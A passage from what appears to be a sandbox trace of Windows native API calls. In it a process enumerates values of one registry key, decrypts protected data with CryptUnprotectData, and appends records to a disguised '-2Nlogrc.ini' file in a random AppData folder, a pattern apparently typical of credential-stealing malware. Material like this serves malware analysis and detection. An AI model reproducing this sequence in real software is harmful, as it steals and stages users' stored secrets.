NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.823] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.823] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e90) returned 1 [0279.823] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.823] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=622, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.823] NtClose (Handle=0x364) returned 0x0 [0279.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.831] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.831] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0279.831] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.831] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=648, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.831] NtClose (Handle=0x364) returned 0x0 [0279.832] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.833] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.833] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.833] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.833] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0xc, ByteOffset=0xdd5fc*=668, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.833] NtClose (Handle=0x364) returned 0x0 [0279.834] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.834] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.834] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.834] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.835] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x22, ByteOffset=0xdd5fc*=680, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.835] NtClose (Handle=0x364) returned 0x0 [0279.837] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.837] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.838] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3710) returned 1 [0279.838] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.838] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=714, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.840] NtClose (Handle=0x364) returned 0x0 [0279.841] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.841] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.841] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.841] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.841] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1e, ByteOffset=0xdd5fc*=738, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.841] NtClose (Handle=0x364) returned 0x0 [0279.842] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.842] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.843] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.843] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.843] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.843] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=768, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.843] NtClose (Handle=0x364) returned 0x0 [0279.844] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.844] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.844] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e90) returned 1 [0279.844] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.844] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x20, ByteOffset=0xdd5fc*=792, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.844] NtClose (Handle=0x364) returned 0x0 [0279.846] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.846] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.846] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2b60) returned 1 [0279.846] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.846] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=824, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.846] NtClose (Handle=0x364) returned 0x0 [0279.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.848] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.848] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2b60) returned 1 [0279.848] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.848] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x22, ByteOffset=0xdd5fc*=844, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.848] NtClose (Handle=0x364) returned 0x0 [0279.849] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.849] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.849] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.850] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.850] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.850] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1c, ByteOffset=0xdd5fc*=878, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.850] NtClose (Handle=0x364) returned 0x0 [0279.856] CryptUnprotectData (in: pDataIn=0xdd6bc, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0xdd6b4 | out: ppszDataDescr=0x0, pDataOut=0xdd6b4) returned 1 [0279.878] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ab4a8) returned 1 [0279.878] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.879] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.879] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.889] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.889] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x26, ByteOffset=0xdd5fc*=906, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.889] NtClose (Handle=0x38c) returned 0x0 [0279.891] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.891] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.891] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.891] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3358) returned 1 [0279.891] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.892] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x2e, ByteOffset=0xdd5fc*=944, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.892] NtClose (Handle=0x38c) returned 0x0 [0279.910] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="0") returned 0x0 [0279.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.910] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.910] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b33e0) returned 1 [0279.910] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.911] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x6, ByteOffset=0xdd5fc*=990, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.911] NtClose (Handle=0x38c) returned 0x0 [0279.916] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.916] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.917] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.917] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.917] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x20, ByteOffset=0xdd5fc*=996, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.917] NtClose (Handle=0x38c) returned 0x0 [0279.938] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="917507") returned 0x0 [0279.938] RtlDosPathNameToNtPathName_U (in: 